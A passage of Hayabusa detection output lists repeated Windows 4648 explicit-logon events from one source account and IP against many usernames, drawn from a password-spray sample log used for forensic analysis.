Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : 